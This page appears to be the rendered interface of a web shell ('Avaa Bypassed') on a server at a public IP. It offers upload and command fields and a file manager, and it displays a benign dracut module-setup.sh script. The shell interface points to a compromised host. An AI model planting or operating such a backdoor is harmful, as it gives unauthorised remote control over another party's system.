404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@3.145.64.210: ~ $
#!/bin/bash

# called by dracut
check() {
    return 255
}

# called by dracut
depends() {
    echo bash
    return 0
}

# called by dracut
install() {
    inst_simple "$moddir/uefi-lib.sh" "/lib/uefi-lib.sh"
}


Filemanager

Name Type Size Permission Actions
module-setup.sh File 212 B 0755
uefi-lib.sh File 4.63 KB 0755